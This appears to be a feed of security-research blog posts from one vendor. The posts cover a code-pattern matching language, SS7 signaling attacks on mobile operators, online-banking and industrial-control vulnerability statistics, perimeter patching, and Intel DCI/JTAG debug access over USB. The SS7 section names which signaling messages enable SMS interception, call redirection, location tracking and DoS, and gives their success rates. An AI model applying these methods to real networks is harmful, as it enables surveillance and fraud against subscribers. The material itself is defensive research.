Syntax

The second article in the series discusses the fact that the basic constructs in imperative programming languages are literals, expressions, and statements. We used a similar approach for the development of a DSL language. Examples of expressions:
  • expr(args); (method call)
  • Id expr = expr; (variable initialization)
  • expr + expr; (concatenation)
  • new Id(args); (object creation)
  • expr[expr]; (accessing an index or key).
Instructions are created by adding a semicolon at the end of the expression.
Literals are the primitive types, such as:
  • Id (an identifier)
  • String (a string enclosed in double quotes)
  • Int (an integer number)
  • Bool (a boolean value)
These literals allow you to describe simple constructs, but you can not describe a range of numbers or regular expressions using them. The advanced constructs (PatternStatement, PatternExpression, and PatternLiteral) were introduced to handle more complex cases. Such constructs are enclosed in special <[ and ]> brackets. The syntax was borrowed from Nemerle language (this language uses these special brackets for quasi-quotation, i.e. transforming the code in these brackets to an AST tree).

Examples of the supported advanced structures are presented in the list below. Syntactic sugar, that makes things easier to read or to express, has been introduced for some structures:
  • <[]>; an extended expression operator (e.g., <[md5|sha1]> or <[0..2048]>)
  • # or <[expr]>; any Expression
  • ... or <[args]>; an arbitrary number of arguments of any kind
  • (expr.)?expr; is equivalent to expr.expr or expr
  • <[~]>expr — expression negation;
  • expr (<[||]> expr)* — union of several expressions (logical OR)
  • Comment: "regex" — search through the comments

Examples of patterns

Hardcoded password (all languages)


(#.)?<[(?i)password(?-i)]> = <["\w*"]>
  • (#.)?; any expression, potentially absent
  • <[(?i)password(?-i)]>; a regular expression for Id types, case insensitive
  • <["\w*"]>; a regular expression for String types

Weak random number generator (C#, Java)


new Random(...)

The lack is caused by using an insecure algorithm for generating random numbers. Yet the standard Random class constructor is used to monitor such cases.

Debug information leak (PHP)


Configure.<[(?i)^write$]>("debug", <[1..9]>)
  • <[(?i)^write$]>;a regular expression for Id types, case insensitive and defines exact occurrences only
  • ("debug", <[1..9]>); function arguments
  • <[1..9]>; a range of integers from 1 to 9

Insecure SSL connection (Java)


new AllowAllHostnameVerifier(...) <[||]> SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER

Using a "logical OR" with syntax structures. Matching both left (constructor invocation) and right (using a constant) part of a structure.

Password in comments (all languages)


Comment: <[ "(?i)password(?-i)\s*\=" ]>

Search for comments in the source code. Single-line comments begin with a double slash // in C#, Java, and PHP; while a double hyphen -- is used in SQL-like languages.

SQL Injection (C#, Java, and PHP)


<["(?i)select\s\w*"]> + <[~"\w*"]>

A simple SQL injection is the concatenation of any string beginning with SELECT and containing a non-string expression on the right side.

session_set_cookie_params(#,#,#)

A cookie has been set without the Secure flag, which is configured in the fourth argument.

An empty try catch block (all languages)


try {...} catch { }

An empty exception handling block. If Pattern Matching module analyzes C# source code, the following code will be matched:

try
{
}
catch
{
}

The matching result for T-SQL source code:
BEGIN TRY
SELECT1/0AS DivideByZero
END TRY
BEGIN CATCH
END CATCH
The matching result for PL/SQL source code:
PROCEDURE empty_default_exception_handler IS
BEGIN
INSERTINTO table1 VALUES(1, 2, 3, 4);
COMMIT;
EXCEPTION
WHEN OTHERS THENNULL;
END;

Cookie <[@cookie]> = new Cookie(...);
...
<[~]><[@cookie]>.setSecure(true);
...
response.addCookie(<[@cookie]>);

Adding a cookie without the Secure flag. Despite the fact that this pattern is better to implement using a taint analysis, we also managed to implement it using a more primitive matching algorithm. This algorithm uses a pinned @cookie variable (by analogy with back references in regex), negation of an expression, and an arbitrary number of statements.

Cursor Snarfing (PL/SQL, T-SQL)

PL/SQL
<[@cursor]> = DBMS_SQL.OPEN_CURSOR;
...
<[~]>DBMS_SQL.CLOSE_CURSOR(<[@cursor]>);
T-SQL
declare_cursor(<[@cursor]>);
...
<[~]>deallocate(<[@cursor]>);

A dangling cursor can be exploited by a less privileged user. Moreover, most unreleased resource issues result in general software reliability problems.

If Pattern Matching module analyzes T-SQL source code, the following code will be matched:

DECLARE Employee_Cursor CURSORFOR
SELECT EmployeeID, Title FROM AdventureWorks2012.HumanResources.Employee;
OPEN Employee_Cursor;
FETCH NEXTFROM Employee_Cursor;
WHILE @@FETCH_STATUS = 0
BEGIN
FETCH NEXTFROM Employee_Cursor;
END;
--DEALLOCATE Employee_Cursor; is missing
GO

Excessively granted privileges (PL/SQL, T-SQL)


grant_all(...)

This flaw may result in inappropriate and excessive privileges assigned to a user. Although the grant all phrase actually is an SQL query, it is converted into a function call, as the pattern matching module doesn't have a notion of a "query".

The following code will be matched: GRANT ALL ON employees TO john_doe;

Summary

We’ve prepared a video to demonstrate the functionality of our Pattern Matching module in PT Application Inspector. This video explains the process of matching against certain patterns of the source code written in different programming languages (C#, Java, PHP). We also show you the proper way to handle syntax errors, which was discussed in the first article in this series.


Next time we will tell you about:
  • Matching, serialization and tree structures bypassing in .NET
  • Building the CFG, DFG and taint analysis
Author: Ivan Kochurkin, Positive Technologies

Attacking SS7: Mobile Operators Security Analysis

$
0
0


The interception of calls is quite a challenging task, but not only intelligence services can pull it off. A subscriber may become a victim of an average hacker who is familiar with the architecture of signaling networks. Commonly known SS7 vulnerabilities allow for the interception of phone calls and texts, can reveal a subscriber’s location, and can disconnect a mobile device from a network.

In 2015, Positive Technologies experts conducted 16 sets of testing involving SS7 security analysis for leading mobile EMEA and APAC operators. The results of the top three projects are included in the statistics below. In this article, we will review the security level experienced by mobile network subscribers, as well as all industrial and IoT devices — from ATMs to GSM gas pressure control systems, which are also considered mobile network subscribers. This article describes detected issues and suggests ways to counter threats.

Due to confidentiality agreements, we cannot disclose the names of companies that took part in the research, but half of the examined SS7 networks belong to large mobile operators with more than 40 million subscribers.



Subscriber database size

Hello from the 70s

The SS7 system CCS-7 which dates back to the 1970s is riddled with security vulnerabilities like the absence of any encryption or service messages validation. While for some time this did not pose any risk to subscribers or operators, as the SS7 network was a closed system available only to landline operators, now the network has evolved to meet new standards of mobile connection and service support. In the early 21st century, a set of signaling transport protocols called SIGTRAN was developed. SIGTRAN is an extension to SS7 that allows for the use of IP networks to transfer messages, and this innovation means the signaling network is not longer isolated.

It is important to note that is is still impossible to penetrate the network directly — a hacker would need an SS7 gateway. But getting access to that gateway is relatively easy, as anyone may obtain the operator’s license in countries with lax laws or purchase access through the black market from a legal operator. There are several ways to get into a network using hacked carrier equipment, GGSN or a femtoсell. If there is an engineer in a hacker group, they will be able to conduct a chain of attacks using legitimate commands or connect their equipment to SS7.

SS7 attacks may be performed from anywhere and an attacker doesn’t have to be in physical proximity to a subscriber, so it is almost impossible to pinpoint him. Additionally the hacker does not need to be a highly skilled professional either. There are many applications for SS7 on the internet, and cellular carriers are not able to block commands from separate hosts due to an unavoidable negative effect on the service and violation of roaming principles.

Originally, SS7 vulnerabilities were demonstrated in 2008. German researcher Tobias Engel showed a technique that allows someone to spy on mobile subscribers. In 2014, Positive Technologies experts presented their report “How to Intercept a Conversation Held on the Other Side of the Planet”. In 2015, Berlin hackers from SR Lab were able to intercept SMS correspondence between Australian senator Nick Xenophon and a British journalist during a live TV broadcast of the Australian program “60 Minutes”. They also managed to geo-track the politician during his business trip to Tokyo.

Espionage, Calls, and SMS Interception

The overall security level of the examined SS7 networks was far below average. In 2015, the following problems with SS7 networks of major mobile operators were found: subscriber data leakage (77% of successful attempts), network operation disruption (80%), and fraud (67%).

We were able to intercept incoming texts in each network, and almost nine out of ten attacks (89%) were successful. This presents a poor image in terms of security as SMS messages are frequently used in two-factor authentication systems and for password recovery on various websites. We employed the UpdateLocation method to test this and an adversary registers a target subscriber in a false network. Then all incoming SMS messages get transferred to the indicated address.



Successful attacks targeted to obtain sensitive information by type

It was also possible to retrieve balance data in almost every single case (92% of attacks) using the ProcessUnstructeredSS-Request message, the body of which contains the corresponding USSD command.

The security of voice calls is better as only half of interception attacks were successful, but that is still a large risk for subscribers. In order to test terminating calls, we used roaming number spoofing and for originating calls, tapping was performed using the InsertSubscriberData method. In both cases, we redirected traffic to a different switch.



Location tracking methods (ratio of successful attacks)

We managed to find out a subscriber’s geodata in all but one network. The most effective methods were SendRoutingInfo and ProvideSubscriberInfo. The latter allowed access over half of the time (53%).

The most valuable subscriber data is the IMSI, as this unique number is essential for the majority of attacks. The easiest way to obtain it is using the SendRoutingInfo method.



Information leakage methods (ratio of successful attacks)

The SendRoutingInfoSM method worked in 70% of cases. It is used for incoming texts to inquire routing data and location, and SendIMSI allows a hacker to obtain a subscriber’s identifier but it is less effective (25% success rate).

Committing Fraud

Each system has its own flaws that allow outsiders to conduct fraudulent actions like call redirection, money transfer from a subscriber’s account, and modification of a subscriber’s profile.


Ratio of successful attacks

The majority of redirection attacks for terminating calls were successful (94%) due to numerous problems related to SS7 protocols and system architecture.

We were able to forward originating calls in only 45% of cases using InsertSubscriberData.

We also performed roaming number spoofing and redirection manipulations to forward terminating calls. Roaming number spoofing is done during a terminating call to a victim who has to be registered in the fake network beforehand. As a response to a roaming number inquiry, an attacker sends a redirection number, and a cellular carrier will have to pay the expenses for all established connections.
Redirection manipulation is unauthorized unconditional forwarding when all terminating calls will be redirected to a given number at the subscriber’s expense.


Methods of terminating calls forwarding (ratio of successful attacks)

Modification of a subscriber’s profile was successful in half of attack attempts with InsertSubscriberData (54%). An attacker can change the profile so that originating calls bypass an operator’s billing system. This attack can be used to direct traffic to premium rate numbers and costly locations at the expense of a cellular carrier.

Subscriber DoS Attack

In order to make subscriber equipment (phone, modem, GSM signaling system or sensor) unavailable for incoming transactions, a hacker may conduct targeted attacks on mobile network subscribers. The majority of researched SS7 networks are vulnerable to DoS attacks (80% success rate).

In all cases, we used the UpdateLocation method, which requires prior knowledge of a subscriber's IMSI. The UpdateLocation message is sent to the operator's network informing HLR of the subscriber's registration in a false network. Then all terminating calls are routed to the address specified during the attack.

What Makes SS7 Vulnerable

Most attacks on SS7 networks were successful due to the lack of verification of an actual subscriber’s location. Other major causes are an inability to check whether a subscriber belongs to a network, an absence of a filtering mechanism for unused signaling messages, and SMS Home Routing configuration error.


Average amount of successful attacks in an SS7 network (depending on a vulnerability type)

What to Do

The majority of flaws that allow an attacker to track a subscriber’s location and steal data could be fixed if operators change network equipment configuration and prohibit the processing of AnyTimeInterrogation and SendIMSI messages via HLR.

The way to fix architecture flaws in protocols and systems is to block undesired messages. A system must consider the use of SendRoutingInfoForSM, SendIMSI, SendRoutungInfoForLCS, SendRoutingInfo. Filtering will help to avoid the risks of DoS, SMS interception, calls forwarding, subscriber’s profile modification.

Not all indicated SS7 messages are dangerous. Operators need to configure filtering to cut off only undesired messages used in attacks, and implement additional security tools, for example, intrusion detection systems. These systems do not interfere with network traffic and are capable of detecting malicious activity and determining necessary configuration for message filtering.

You may find the full research here: www.ptsecurity.com/library/whitepapers/

Online Banking Vulnerabilities: Authorization Flaws Lead the Way

$
0
0


Online banking (OLB) systems are publicly available web and mobile applications, so they suffer from vulnerabilities typical of both applications and banking systems. Bank-specific threats include theft of funds, unauthorized access to payment card data,  personal data and bank secrets, denial of service and many other attacks that can trigger significant financial and reputation losses.

This report synthesizes statistics that were gathered during OLB security audits performed by Positive Technologies in 2015. Comparison with the results obtained in 2013 and 2014 vividly illustrates the dynamics of information security development in modern OLB systems.

Cases

The research covered 20 OLB systems, including several financial services written in 1C that usually have vulnerabilities similar to those in online banking. The 20 OLB systems tested have all undergone a complete analysis including an operation logic audit. Most systems are designed for personal online banking (75%) and they include mobile banking systems consisting of server and client components (35%).

65% of the systems were developed by banks using Java (the majority of apps) and 1C (8%). The rest were implemented on platforms of well-known vendors. In order to comply with our responsible disclosure policy regarding vulnerabilities, no companies are named in this report.

Most OLB systems (75%) are operational and accessible to clients. The rest are testbeds, but ready for commissioning. 57% of OLB systems developed by well-known vendors are operational.

Vulnerabilities and Threats

The percentage of high-severity vulnerabilities has dropped from 44% (2013-2014) to 30% (2015), though the general level of OLB security remains low: high-severity vulnerabilities exist in almost every online banking service (90% of systems in 2015 vs 78% in 2013-2014).

More than half of the systems tested (55%) contain vulnerabilities that may lead to unauthorized access to user data. These security bugs are primarily caused by authorization flaws. The second most common flaw (50%) is insufficient session security (improper user session termination, incorrect cookie settings, multiple sessions under the same account, and lack of association between user sessions and client IP addresses).

In 2013-2014, the CVE-2015-1635 vulnerability was absent, but in 2015, it was detected in two OLB systems. This vulnerability is generated by HTTP.sys errors on Windows (see Microsoft MS15-034). Exploiting this security flaw, hackers can execute arbitrary code or conduct a DoS attack via specially crafted HTTP requests.

The research also revealed threats that could be used against OLB systems if exploited together with other vulnerabilities detected. Thus, one of the systems allows a hacker to steal money via a combination of insufficient session security and two-factor authentication flaws.


Top OLB vulnerabilities (across systems)

25% of the investigated OLB systems are under threat of serious attack. These attacks include theft of money by an authorized user as a result of rounding attacks, unauthorized access to arbitrary user operations, and SQL Injection. As a result, banks could suffer financial losses and lose their reputation as a reliable partner. About half of the systems (55%) allow an unauthorized user to access a DBMS with personal and financial data.


OLB security issues

Commercial OLB Systems Became More Vulnerable

All commercial OLB systems appear to be exposed to high-severity vulnerabilities. This is similar to personal OLBs (87%). The number of medium-severity vulnerabilities per commercial system has visibly increased since 2014. The security level of commercial OLB systems has dropped, the security level of personal systems remains as low as in 2014.


Average number of vulnerabilities in personal and commercial systems

OLB Vendors Do Not Guarantee Security

OLB systems supplied by vendors contain 50% more source code bugs than OLBs developed by on-site programmers (40% vs 28%), though in-house OLBs have more vulnerabilities in program configuration (35% vs 27%). In 2013 and 2014, off-the-shelf OLBs had twice as few security flaws (14%).

The number of high-severity vulnerabilities in online bank systems developed by vendors has dropped as compared to 2013-2014, but nonetheless all of these products have critical bugs.

OLB systems supplied by dedicated developers contain 1.5-2 times more vulnerabilities than in-house systems, as the latter are developed for a particular architecture and have set functionality, which makes them simpler and, thus, less vulnerable. However, switching from off-the-shelf to in-house systems does not mean that the newly developed OLB will be secure.


Vulnerabilities by severity for off-the-shelf and in-house systems

Production Systems are Vulnerable

Production systems contain fewer vulnerabilities than testbed systems in 2015, indicating that banks undertake some effort to secure their running applications. However, the security level of production OLB systems is not high: almost all of them contain high-severity threats. 40% of all vulnerabilities detected in production systems are highly dangerous.


Vulnerabilities of various severity in test and production systems

Flaws of Protection Mechanisms

A predictable ID format is typical of all OLB systems, and only 60% of them provide users with an opportunity to change it.

Two-factor authentication used for logon and transactions mitigates risks of users’ money being stolen, but 24% of systems do not use this mechanism at all and 29% of systems implement it incorrectly. Almost half of the in-house systems (45%) are vulnerable, and off-the-shelf systems also have this flaw (33%).

Over one third of OLB (35%) do not protect a session from hijacking and further exploitation.


Authentication vulnerabilities in off-the-shelf and in-house systems

iOS Banking Apps are Better

iOS applications are still more secure than Android apps with 75% of systems exposed to high-severity vulnerabilities, but one third of security bugs in iOS apps are highly dangerous. These bugs are triggered by storing and transferring data in clear-text.


Application vulnerabilities by mobile OS

Each Android application contains 3.8 vulnerabilities (compare to 3.7 in 2013-2014), while each iOS application contains 1.6 vulnerabilities (2.3 in 2013-2014).


Top mobile banking vulnerabilities

Though the most common mobile OLB vulnerabilities are classified as medium severity, in some cases a combination of bugs can have a critical impact on the system. For example, if logon is performed via a short PIN code and session IDs are stored in the file system, a hacker with physical access to the device can spoof a web server’s response, and every time an incorrect PIN code is entered, the server will return the true value. A hacker can thus obtain full control over a user’s personal account including changing settings or executing transactions. One of the systems tested allows a hacker to access a user’s mobile bank, exploiting insecure data transfer. In this case, the system facilitates the use of self-signed certificates while transferring data via HTTPS.

Conclusion

The security level of OLB systems remain low, though the total number of high-severity vulnerabilities has dropped as compared to 2013-2014.

The security bugs found in systems already put into production indicate the importance of secure software development lifecycle processes. Security audits of an OLB system should be performed not only prior to commissioning, but also during the course of its operational use. These audits should be regular (e.g. twice a year) and should involve control over elimination of detected flaws.

Off-the-shelf systems are of primary concern: in fact, they are more vulnerable than systems developed by on-site programmers. Banks should also use preventive protection means like web application firewalls. When using commercially available systems, a WAF is required until the third-party vendor releases an update, which prevents attackers from exploiting already known vulnerabilities.

To access a user account, a hacker needs to use well-known flaws like insufficient session security. OLBs must ensure that the correct implementation of security mechanisms is used. It is important to implement secure development procedures and provide comprehensive testing at the acceptance stage.

Considering the findings of this report, that the severity of source code vulnerabilities remains relatively high, it is necessary to regularly check OLB security via white-box testing (including automated tools) or other techniques.

Full research is available at www.ptsecurity.com/library/whitepapers/

Industrial Control Systems 2016 Report: Connected and Vulnerable

$
0
0
Industrial control systems (ICS) are part and parcel of everyday life, from smart homes to nuclear power stations. ICS bridge the gap between the digital world and the physical world by interpreting the commands that control turbines, switches, valves, and more. Because these systems are complex, critical to infrastructure, and often Internet-connected, they make a very tempting target for hackers.

The number of vulnerable ICS components grows every year. Nearly half of the vulnerabilities identified in 2015 are high-risk – and the majority of vulnerabilities were found in the products of the most well-known vendors. Widespread poor security practices, such as default passwords and dictionary-guessable passwords, make it easy for outsiders to access the systems and gain control.


These are the sobering conclusions of research by Positive Technologies, which analyzed data on ICS vulnerabilities from 2012 to 2015, as well as information on the Internet availability of ICS components in 2015. Below is a summary of the findings.

Methods

The source material consisted of publicly available information such as vulnerability databases (ICS-CERT, NVD, CVE, Siemens Product CERT, Positive Research Center), vendors’ advisories, exploit databases and packs (www.exploit-db.com, www.rapid7.com/db/ etc), conference presentations, and publications on blogs and industry sites. CVSSv2 was used to assess vulnerability severity.

To collect information on the online availability of ICS components, researchers scanned Internet-accessible ports using publicly accessible search engines: Google, Shodan, and Censys. Once collected, the data was subjected to additional analysis to determine a relationship to ICS equipment. Positive Technologies specialists created a database of ICS identifiers, consisting of approximately 800 entries that allow inferring the product and vendor from the banner.

Results

In total, vulnerabilities in components from approximately 500 ICS vendors were considered. 743 vulnerabilities were found in all. In 2015, experts at Positive Technologies independently discovered 7 new vulnerabilities (2 of them high-risk) and notified the relevant vendors.

As noted in our previous report, SCADA Safety in Numbers, between 2009 and 2012 the number of discovered ICS vulnerabilities soared by over 20 times (from 9 to 192). In recent years (2012–2015), the number of vulnerabilities discovered each year has remained stable at approximately 200. This is the result of increased interest by vendors in addressing vulnerabilities and interacting with the security community.


Total number of vulnerabilities discovered in ICS components 

The vendors of the most vulnerable ICS components, in terms of number of vulnerabilities found, are Siemens, Schneider Electric, and Advantech. However, these numbers paint only a partial picture: they depend on the prevalence of the product and on whether the vendor practices responsible disclosure. Therefore, these figures cannot be used to judge the degree of security of particular solutions from any particular vendor.



Number of vulnerabilities in ICS components (by vendor)

The largest number of vulnerabilities was identified in SCADA components and programmable logic controllers (PLCs), industrial network devices and engineering software, human–machine interfaces (HMIs), and remote access and management terminals. These results show little change from 2012.

Most vulnerabilities are of either high or medium risk (47% high, 47% medium). Looking at the degree of risk based on the feasibility of threats to confidentiality, integrity, and availability, over half of the vulnerabilities score as high-risk on the important availability metric. Threats to availability, combined with the possibility of remote exploitation and weak authentication mechanisms, substantially increase the risk of damaging ICS attacks.



Distribution of vulnerabilities (by risk)

Data on vulnerability fixes is not published, so Positive Technologies researchers relied on information provided by the vendors themselves. Detailed information on the vulnerabilities already fixed by vendors is provided on the company website. 2015 data shows that only 14% of vulnerabilities were resolved within three months, while 34% waited over three months and the remaining 52% either were never repaired, or the date of repair was not given by the vendor.



Repair timeline for vulnerabilities identified in ICS components

However, published exploits are available for only 5% of known vulnerabilities. This is an improvement over 2012, when exploits could be found for 35% of vulnerabilities.

Most vulnerabilities fall into the categories of DoS, Remote Code Execution, and Buffer Overflow. Exploitation of these vulnerabilities by an intruder could cause equipment failure or unsanctioned operation of the equipment, which is equally undesirable given the reliability requirements and sensitivity of ICS components.


Most common types of vulnerabilities in ICS components

As of March 2016, 158,087 ICS components were available online. Most of these components were accessible via HTTP, Fox, Modbus, and BACnet, and in most cases, a dictionary password was used for authentication.

The largest numbers of Internet-available ICS components were found in the USA (43%), Germany(12%), and France, Italy, and Canada (approximately 5% each). The low number of ICS components found in Asia is due to the use of local solutions that are little known outside of their home markets. Russia placed 31st, with 600 available components (less than 1% of the total).


Number of Internet-available ICS components (by country)

The largest vendors of the found Internet-available ICS components are Honeywell (17%), SMA Solar Technology (11%), and Beck IPC (7%). Among Internet-available components, the most common are building automation systems from Tridium, a Honeywell company (25,264), and energy managementsystems, including photovoltaics from SMA Solar Technology (17,275).

Positive Technologies researchers were also able to “find“ automated control systems responsible for manufacturing processes, transportation, and water supply. In many cases, intruders would not even need any special knowledge to gain access. Of the ICS components found online, only two thirds can be reasonably described as secure.


Breakdown of vulnerable vs. secure Internet-available ICS components 

These results suggest that ICS security from cyberattacks in 2016 is still deficient. Even basic security hygiene – such as use of complex passwords and disconnecting ICS components from the Internet – goes a long way toward preventing attacks with potentially enormous consequences.

Full text of the “Security Trends and Vulnerabilities Review. Industrial Control Systems” report is available at www.ptsecurity.com/library/whitepapers/

Protecting the Perimeter: Old Attacks Work Just as Well as New Ones

$
0
0
When we think about external threats to information security, often our first thoughts are of hacker attacks on the network perimeter—say, advanced persistent threats (APTs) targeting large companies and governments. One example is the compromise of the Equation Group with publication of some of the group's tools for breaching the network perimeter. But as it turns out, many of the exploits have been known for a long time, although the “cherry on the cake” was a zero-day vulnerability for SNMP services (with SNMP standing for “Security Not My Problem”). While we do not have a full list of the compromised exploits, we can start with the other end of the equation by evaluating the state of protection of corporate perimeters with the help of real-world vulnerability statistics.

One such study was presented at PHDays VI as part of Positive Research 2016. The sample spanned approximately 10,000 accessible addresses and 15,000 vulnerabilities over a two-year period (2014–2015). Note that these numbers include ONLY network perimeters with above-average security. Only companies with asset inventory and vulnerability management processes (which, in turn, enable collecting statistics) were included.

Let's start with the “sexiest” morsel from the published exploit pack: the SNMP 0-Day. Is this something to be worried about? Our study shows that the answer is “yes”. A few reasons:

  • Our analysis based on honeypot systems shows that SNMP services are very popular with would-be intruders. Many hackers are well aware of the availability of these services, and those who don't know yet need only Shodan to find out.
  • SNMP services are numerous and accessible on most modern network infrastructures. We have written previously how exploitation of SNMP vulnerabilities allows intruders to gain a foothold on the internal networks of telecom operators.
  • Many SNMP services are running on obsolete software. Our research showed that in the category of DNS/NTP/SNMP services, the vulnerability rate reaches one in ten:


Based on these statistics, we clearly see that the SNMP exploit is very dangerous and can be used to breach the network perimeter of many companies and organizations.

But there remains another interesting question. Why would the toolkit of the Equation Group, which has been described as a “full-fledged nation-state cyber-arsenal,” contain so many exploits for old vulnerabilities for which patches were issued over five years ago? If this hacker group is so amazing, shouldn't they be using new, unknown vulnerabilities?

The answer is paradoxically simple once we restate the question. Why should hacker groups waste their precious time on finding zero-days if many Internet-accessible systems have not been updated for years?

Our study showed that three quarters of all the vulnerabilities found were over one year old; 30% were over five years old. Almost one in ten vulnerabilities were fixed a whopping ten years ago! During the time period of our research, vulnerabilities were found on 37% of systems.


A successful attack does not require using the latest-and-greatest vulnerabilities. Old ones will do the job just as well and are cheaper too. And importantly, potentially drawing attention to an old vulnerability is a much easier choice for an attacker than risking a precious zero-day.

But so far we have been looking only at exploits in non-public packs. What about exploits for old vulnerabilities available publicly, such as from MSF? To answer this question, we selected vulnerabilities with a CVSS rating of “High” that were present at the beginning of the research period on the test systems. We then cross-referenced them with known exploit packs.


The data shows that the tested perimeters are vulnerable to publicly available exploits. However, this sample contains a very small number of vulnerabilities. Does this actually mean that there are not many of them? As mentioned above, the breakdown of vulnerabilities in the previous figure reflects only the start of the study period, even though perimeter security is constantly in flux. The following charts show the change in security level over two years:


To summarize: breaching network perimeters with above-average security does not require non-public exploits, much less secret zero-days by APT groups. Standard tools and basic knowledge are more than enough in many cases.

How to stay protected

Based on our findings, we propose several main points for increasing the overall level of protection of the network perimeter:
  1. Constant monitoring of the network perimeter, resulting in timely awareness of the services that are on the perimeter and Internet-accessible.
  2. Automated search for vulnerabilities in perimeter services, resulting in identification and eventual elimination of vulnerabilities.
  3. Removal of services from the perimeter when there is no compelling need for them. These services may include NTP, SNMP, database management, administration interfaces, and other potentially dangerous services.
  4. Implementation of a patch management policy, prioritizing systems with vulnerabilities for which exploits are publicly available as well as the most vulnerable systems. Remaining systems should be updated based on vulnerability and system criticality priorities.
  5. A comprehensive approach to information security. Protecting the network perimeter is a vital part of security, but the perimeter is by no means the only vector for intruders to gain access to company infrastructure.
Read the full version of our report on Corporate Perimeter Protection here: https://www.ptsecurity.com/upload/iblock/9db/network_perimeter_eng.pdf


Intel debugger interface open to hacking via USB

$
0
0

New Intel processors contain a debugging interface accessible via USB 3.0 ports that can be used to obtain full control over a system and perform attacks that are undetectable by current security tools.

A talk on the mechanisms needed for such attacks and ways to protect against them was given by Positive Technologies experts Maxim Goryachy and Mark Ermolov at the 33rd Chaos Communication Congress (33C3) in Hamburg, Germany.

The problem

Manufacturer-created hardware mechanisms, such as motherboard debugging interfaces, have legitimate purposes including hardware configuration debugging features for hardware configuration and other beneficial uses. But these low-level mechanisms can also be exploited by attackers without special equipment or huge resources.

Our experts analyzed and demonstrated one of these mechanisms in their presentation. The JTAG (Joint Test Action Group) debugging interface, which can be accessed via USB, has the potential to enable dangerous and virtually undetectable attacks. JTAG works below the software layer for the purpose of hardware debugging of the OS kernel, hypervisors and drivers. At the same time, this CPU access can be abused for malicious purposes.

On older Intel CPUs, accessing JTAG required connecting a special device to a debugging port on the motherboard (ITP-XDP). JTAG was difficult to access for both troubleshooters and potential attackers. However, starting with the Skylake processor family in 2015, Intel introduced Direct Connect Interface (DCI), which provides access to the JTAG debugging interface via common USB 3.0 ports.

An attacker could use this mechanism as a backdoor and bypass all security systems; JTAG allows embedding code at a certain point in time, reading all data, and also making the machine inoperable (for example, by re-writing the BIOS).

To be successful, the attacker must know that the DCI interface is activated on the victim’s computer (relevant methods are described in the presentation). The researchers did not see any signs of motherboard vendors shipping their products with DCI activated, but nothing is stopping cybercriminals from enabling DCI at any time via BIOS modification or via operating system using P2SB device.

In fact, this JTAG debug capability can also be chained with specially crafted USB as part of an even more sophisticated attack. A cybercriminal can create a "bad" USB device that looks similar to an ordinary USB drive, but after being connected to a USB 3.0 port, in addition to being a storage device, the device obtains full access to the victim’s PC without any additional action and remains totally hidden (the mouse and keyboard will not show signs of manipulation), as is the case with some less-advanced malicious USB devices).

The experts described how such attacks could work in the real world: "For example, you order a number of laptops with U-series CPUs for your company. The bad guys interfere with the purchasing process, activate DCI at any time via BIOS or with special activation code on a target system, and all the testing is successfully passed (correct BIOS version, everything matches, all disks are encrypted, etc.). Then an insider with a malicious USB device plugs the device into one of these laptops at the company and gets full access while no one is watching".

Positive Technologies’s experts have reported this case to Intel and here is what company’s Product Security Incident Response Team replied:

Intel implemented a proprietary Intel® Direct Connect Interface (DCI) over USB for JTAG debugging of closed chassis systems as a feature for 6th and 7th Gen Intel® Core™ processor based platforms. DCI is an integral part in enabling debug of today's light and small form factor systems via industry standard JTAG protocols. To provide additional security, the DCI interface is disabled by default per Intel specification and can only be enabled with user consent via BIOS configuration. Physical access and control of the system is required to enable DCI, however even when enabled, access to Intel confidential capabilities of the JTAG debugging commands is not possible without proprietary keys obtained via Intel license agreement.

Demo and slides

To date, JTAG mechanism can be exploited only on Intel U-series processors. Video of the presentation given at 33C3 can be found below:


Here is the demo attack:


And presentation slides:



Security reflections from Mobile World Congress

$
0
0

Michael Downs, Director of Telecoms Security, EMEA

Mobile World Congress is not just a name, it is perfectly descriptive.  The entire mobile world squeezes into a few square kilometres of Barcelona for four days. Given this concentration of senior execs, it’s a good place to form an opinion on industry trends and try to understand the place security has in the future of mobile.    

Transport was a massive theme this year.  Someone mentioned there were more car companies here than at a recent major motor show, and everything from chip-set manufacturers to infrastructure providers were touting their connected mobility play.  It seems to be the most obvious large scale early application for the Internet of Things as companies see problems that can be solved with data connections, namely accidents, congestion and general resource waste. The promise is great. 

However, from a security point of view, I got the impression the priorities for many of these propositions was traditional elements such as speed to market, efficiency of UI, prioritizing functionality, hardware power, connection speeds etc.  Not many of the people on the booths I questioned could truly answer the question of what they were doing to keep connected cars, trucks and buses secure from abuse.  Maybe it was an unfair question, but given the scale of what is being proposed, this raised a few eyebrows amongst our experts.  The consequences of attacks on a fleet of trucks, or the targeting of a car’s systems, don’t bear thinking about.  Theoretically, such attacks are possible in the same way an attacker would abuse existing Diameter or SS7 networks.  Everything is assigned a number in the network the same way a phone is, providing a marker from which to develop an attack profile.



This theme grows further when you look at the underlying narrative for the show as a whole, that of attaching a data connection to everything. Lots of marketing dollars were spent on tiny models of everything from stadiums, to entire cities.  This is being enabled by the hope the industry has for emerging protocols such as 5G and LTE-M.  More capacity and higher speeds, means more things can now talk to the Internet.    



This is good for the mobile industry, but also for attackers, as more connected things simply mean a larger attack surface on which to work.  As was demonstrated at our expert dinner, we believe too many vulnerabilities are still present, both in the underlying infrastructure that carries data and also in the radio delivery from base station to user.  This will only be compounded on as more things become connected on an application level, driven by increased digitization and usage of emerging web technologies.

From a signalling (SS7 and Diameter) point of view, the underlying infrastructure to support this brave new world is vulnerable, and becoming easier and cheaper to access by an attacker. For dollars per day, bad actors can now buy access to core telecoms networks on the black market and exploit either existing flaws, or new ones.  Once inside, all that is needed  is a phone number (MSISDN) of your target or targets, be it a person or a fleet of connected cars, to manipulate the commands accordingly.  The move towards new protocols will only present new opportunities for bad actors, who are notoriously creative and persistent.

There are also weaknesses from a radio frequency point of view, as vulnerabilities exist in the vast majority of communication protocols and their implementation. Again, as we saw at our expert’s dinner, armed with just a Raspberry Pi, a chipboard bought for a few dollars and some Python script, data can be sniffed, intercepted, even decrypted on the fly and altered to carry out the whim of the attacker.  Whilst we demonstrated some of this on a toy drone, it is important to note that the same protocols are used in the delivery of the entire gamut of ‘things’ connected by mobile networks.  This means everything from industrial control systems to cars.

This is not intended to be a doomsday rant.  These are points we believe, as a research based security company, are important to be on the mind of the mobile industry.  Many believe we are on the edge of a new industrial revolution. If this is true, then the old mantra that security needs to be built into the heart of things is never truer than right now.  We look forward to spending time making sure the brave new world the mobile industry is creating, is kept safe and can flourish for everyone’s benefit.


Cobalt: How Criminals Hacked ATMs

$
0
0


Image: redspotted | Flickr

